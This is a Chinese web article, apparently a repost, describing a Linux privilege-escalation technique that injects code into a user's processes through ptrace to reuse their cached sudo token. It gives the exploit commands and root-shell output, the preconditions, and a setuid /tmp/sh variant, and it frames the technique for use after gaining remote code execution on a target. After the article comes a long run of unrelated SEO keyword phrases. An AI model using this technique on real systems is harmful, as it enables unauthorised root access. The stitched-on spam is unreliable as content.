linux中如何利用sudo token实现提权
发表于:2025-11-17 作者:千家信息网编辑
千家信息网最后更新 2025年11月17日,小编给大家分享一下linux中如何利用sudo token实现提权,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!如何利用系统中的漏洞?$sudo whatever[sudo]pass
千家信息网最后更新 2025年11月17日linux中如何利用sudo token实现提权
小编给大家分享一下linux中如何利用sudo token实现提权,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!
如何利用系统中的漏洞?
$sudo whatever[sudo]password for user: # Press+c since you don't have the password. # This creates an invalidsudo tokens.$ sh exploit.sh....wait 1 seconds$sudo -i # no password required :)# iduid=0(root)gid=0(root) groups=0(root)
实现要求
1、 完全启用Ptrace(/proc/sys/kernel/yama/ptrace_scope == 0);
2、 当前用户必须开启一个拥有有效sudo令牌并且相同uid的活动进程;
注:默认密码的超时时间为15分钟,如果你在15分钟内使用sudo两次,系统就不会要求你再输入用户的sudo密码了。
工作机制
项目目录中的Exploit.sh会向当前用户的所有进程注入Shell代码,并使用它们的sudo令牌来验证我们自己的sudo口令。仅需三行Shell代码,一切皆有可能。
使用样例
假设,你拿到了一个RCE,而且没有用户密码,但目标用户使用了sudo,那么你就可以通过窃取他的sudo令牌来实现提权啦!
如何在实验环境中模拟?
#echo 0 > /proc/sys/kernel/yama/ptrace_scope# #Don't worry this is not persistent accross reboot
打开两个终端窗口:
1、 其中一个执行sudo命令,然后输入正确的用户密(sudo ls);
2、 另一个按照上述方法执行漏洞利用代码;
使用exploit_v2.sh在/tmp/sh中创建一个suid sh
如果exploit_v1无法成功的话,大家可以尝试一下exploit_v2.sh:
$./exploit_v2.shCurrentprocess : 2441chmod:changing permissions of 'activate_sudo_token': Operation not permittedInjectingprocess 1721 -> bashInjectingprocess 2433 -> bashcat:/proc/2446/comm: No such file or directoryInjectingprocess 2446 ->$/tmp/sh -p# iduid=1001(test)gid=1001(test) euid=0(root) egid=0(root) groups=0(root),1001(test)
看完了这篇文章,相信你对"linux中如何利用sudo token实现提权"有了一定的了解,如果想了解更多相关知识,欢迎关注行业资讯频道,感谢各位的阅读!
用户
代码
令牌
密码
漏洞
篇文章
系统
进程
输入
有效
相同
成功
两个
仅需
口令
可以通过
命令
完了
方法
时间
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
无共享数据库架构
常熟正规网络技术专业服务
广告第三方软件开发工具包
服务器端口占用
大学网络技术高等数学
网络安全和净化工作
南京crm软件开发哪家好
流程数据库管理系统
沈阳争时网络技术有限公司
怎么网页布置到腾讯云服务器上
计算机网络技术第四阶段
saas系统是服务器吗
湖南常用软件开发预算
刺激战场现在哪个服务器人最多
光荣使命怎么开服务器
黑客进入数据库删改数据
校园网络安全情景短剧剧本
如何设置wifi网络安全性
小学争做网络安全小卫士活动方案
国家网络安全宣传周宣传画
完美重启服务器一般要多久
软件开发工程师行业发展情况
怎样数据库技术及应用
网络安全中的真实性的概念
聊天社交直播软件开发
泰拉瑞亚服务器ip
氧气听书软件开发
湖南常用软件开发预算
工业服务器安全
妈妈好昆山网络技术